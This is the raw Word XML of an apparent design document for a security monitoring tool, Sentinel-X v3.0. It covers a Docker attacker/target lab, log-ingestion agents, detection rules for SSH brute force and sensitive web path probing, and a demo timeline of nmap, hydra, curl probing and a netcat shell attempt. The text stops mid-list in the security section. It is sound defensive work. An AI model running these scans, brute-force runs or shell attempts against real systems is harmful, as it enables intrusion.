        <w:t xml:space="preserve">The Sentinel-X container is the existing v2.1 engine enhanced with real-log ingestion capabilities. The critical architectural addition is the docker-compose volume configuration that binds the target's log directory into the Sentinel-X container's filesystem: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docker-compose.yml (v3.0 additions)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services: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attacker:</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build: ./containers/attacker</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container_name: sentinelx_attacker</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networks: [lab_network]</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target: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build: ./containers/target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container_name: sentinelx_target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networks: [lab_network]</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volumes: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target_logs:/var/log   # expose logs to Sentinel-X</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sentinel-x:</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build: .</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container_name: sentinelx_engine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networks: [lab_network]</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volumes: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target_logs:/target-logs:ro   # read-only mount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/var/run/docker.sock:/var/run/docker.sock  # Docker API</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ports: ["8000:8000"]</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depends_on: [target]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volumes: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target_logs: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networks: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lab_network:</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driver: bridge</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ipam:</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config: [{subnet: "172.20.0.0/24"}]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. 7-LAYER SOC STACK (v3.0 Enhanced)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The existing Sentinel-X 7-layer security stack is fully preserved in v3.0. Each layer receives targeted enhancements to support the real-log ingestion pipeline. The stack is not modified — it is extended.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900"/>
        <w:gridCol w:w="4260"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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v2.1 Capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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v3.0 Enhancement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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MONITORING</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Linux / Windows / macOS agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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linux_agent.py reads /target-logs/auth.log via shared Docker volume; new container_telemetry_agent.py reads Docker socket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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NORMALIZATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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ECS-compatible schema mapper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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New parser: ssh_bruteforce_normalizer() extracts source IP, attempt count, target user from PAM auth.log format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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DETECTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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YAML rule evaluation (sliding window)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Brute force rule threshold tuned for real hydra traffic; new rule: web_path_probe.yaml for Apache 404 flood detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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L4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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CORRELATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Multi-signal + Diversity Boosting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Attack chain: nmap_recon → brute_force → web_probe → shell_attempt correlated as one unified incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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L5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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EXPLAINABILITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Claude API / Ollama narratives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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AI narratives enriched with actual log lines from the real attack as evidence; MITRE mapping unchanged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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L6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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RESPONSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Human-in-the-loop SOAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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New response action: isolate_container() calls Docker API to pause the target container on critical alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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L7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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DASHBOARD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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React 18 SOC Visualiser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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New panel: "Attack Origin" shows attacker container IP; live attack timeline correlates all 4 phases visually</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. NEW CODE: REAL-LOG INGESTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1  agents/linux_agent.py (v3.0 additions)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Linux agent receives a new configuration path — target_log_path — that points to /target-logs/auth.log (the shared volume mount). When this path is set, the agent tails it identically to a local log file. No code changes to the core tail loop; only the configured path changes.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linux_agent.py — target log path extension</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In __init__:</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self.target_log_path = config.get(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"target_log_path", "/target-logs/auth.log")</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async def _monitor_target_logs(self):</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"""Tail the Docker-shared target auth.log."""</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path = Path(self.target_log_path)</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if not path.exists():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logger.warning(f"Target log not found: {path}")</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return</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async with aiofiles.open(path) as f:</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await f.seek(0, 2)  # tail from end</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while self._running:</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line = await f.readline()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if line:</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event = self._parse_auth_log(line.strip())</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if event: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await self.event_queue.put(event)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else:</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await asyncio.sleep(0.05)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2  agents/container_telemetry_agent.py (new file)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A new agent module reads the Docker socket to stream container-level events. This provides a secondary telemetry path independent of the shared volume, and also enables detection of container lifecycle events (start, stop, die) that may indicate incident response or attacker pivot attempts.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container_telemetry_agent.py (new)</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import docker</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import asyncio</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class ContainerTelemetryAgent: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"""Streams Docker container logs via Docker socket."""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def __init__(self, config, event_queue):</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self.client = docker.from_env()</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self.event_queue = event_queue</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self.target_name = config.get(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"target_container", "sentinelx_target")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async def run(self):</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container = self.client.containers.get(self.target_name)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loop = asyncio.get_event_loop()</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for log_line in container.logs(stream=True, follow=True):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event = self._normalize(log_line.decode().strip())</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if event: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await self.event_queue.put(event)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def _normalize(self, line):</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return {"source": "docker", "raw": line,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"timestamp": datetime.utcnow().isoformat()}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. DETECTION RULES (v3.0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1  Updated: detection/rules/brute_force.yaml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The existing brute force YAML rule is updated with thresholds tuned for real hydra traffic. Hydra in default mode generates 4 parallel threads; the rule window and count are calibrated accordingly to fire within the first 10 seconds of the attack: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brute_force.yaml (v3.0 tuning)</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id: BF-001</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name: SSH Brute Force Attack</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description: Multiple failed SSH authentication attempts from one source</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mitre_tactic: Credential Access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mitre_technique: T1110.001</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severity: high</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conditions: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event_type: auth_failure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service: sshd</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window_seconds: 30</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threshold: 10          # hydra fires ~4/s; 10 hits in 30s = confirmed</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group_by: source_ip</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actions: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alert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block_source_ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2  New: detection/rules/web_path_probe.yaml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A new rule added specifically to detect the web path scanning phase of the attack sequence, where curl probes a series of sensitive paths (/admin, /phpmyadmin, /.env, etc.) in rapid succession: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web_path_probe.yaml (new rule)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id: WEB-002</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name: Sensitive Path Enumeration</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description: Rapid sequential requests to sensitive web paths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mitre_tactic: Discovery</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mitre_technique: T1083</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severity: medium</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conditions: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event_type: http_request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response_code: [403, 404]</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path_patterns: ["/admin", "/.env", "/wp-admin", "/config",</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"/phpmyadmin", "/.git", "/backup"]</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window_seconds: 20</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threshold: 4</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group_by: source_ip</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actions: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alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3  Updated: correlation/engine.py — Full Attack Chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The correlation engine is updated to recognise the full 4-phase attack chain as a single correlated incident. When all four phases fire within a 5-minute window from the same source IP, the engine elevates the severity to CRITICAL and generates a unified incident narrative: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correlation engine — attack chain definition</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ATTACK_CHAINS = {</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"full_recon_to_exploit": {</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"sequence": ["RECON-001", "BF-001", "WEB-002", "C2-001"],</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"window_seconds": 300,</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"group_by": "source_ip",</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"severity_override": "critical",</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"mitre_tactic": "Multi-Stage Intrusion",</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"description": "Complete attack lifecycle: recon → credential \</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access → discovery → C2 establishment"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. DEMO PROCEDURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The entire demo runs with three commands. No pre-loaded data, no injected events, no simulation. Every alert the judge sees on the dashboard was triggered by a real tool running against a real target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step-by-Step Demo Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 1 — Start the lab (one command launches all three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Terminal command</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docker-compose up --build</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 2 — Open the Sentinel-X dashboard in a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Dashboard URL</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http://localhost:8000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 3 — Launch the automated attack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Execute attacker script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docker exec sentinelx_attacker ./attack_orchestrator.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 4 — Watch real alerts fire on the dashboard (no action needed)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Time (approx)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Alert Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="256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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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T+00:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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docker-compose up completes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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System online</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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INFO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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T+00:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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nmap scan begins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Port scan activity (RECON-001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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T+01:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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hydra SSH brute force begins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Brute force detected (BF-001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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T+02:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Brute force threshold exceeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Source IP auto-blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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T+02:10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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curl web path probing begins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Path enumeration (WEB-002)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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T+02:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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netcat shell attempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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C2 beacon attempt (C2-001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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T+02:35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Correlation engine fires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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CRITICAL: Full attack chain detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="256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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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T+02:36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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AI narrator generates report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Forensic narrative with MITRE map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="256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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. UPDATED FOLDER STRUCTURE (v3.0)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2A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00D4FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Project root — v3.0 additions highlighted with [NEW]</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sentinel-x/</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containers/                     [NEW]</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attacker/</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 Dockerfile              [NEW] Kali Linux attacker</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 attack_orchestrator.sh  [NEW] Automated attack script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target/</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Dockerfile              [NEW] Ubuntu 22.04 vulnerable target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agents/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linux_agent.py              [UPDATED] +target log path support</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container_telemetry_agent.py [NEW] Docker socket reader</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base_agent.py</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macos_agent.py</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windows_agent.py</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detection/</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rules/</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brute_force.yaml        [UPDATED] Tuned thresholds</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web_path_probe.yaml     [NEW]</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c2_beacon.yaml</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 exfiltration.yaml</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lateral_movement.yaml</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correlation/</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 engine.py                  [UPDATED] +full attack chain</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docker-compose.yml             [UPDATED] 3-container lab</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api/, config/, dashboard/</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explainability/, normalizer/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="091828" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="AACCDD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">│   response/, scripts/, storage/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D1F35" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="AACCDD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">│   tests/                          (all unchanged from v2.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. SECURITY CONSIDERATIONS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Real-Attack Docker Lab is designed for controlled demonstration environments only. The following safeguards are mandatory:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Network Isolation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
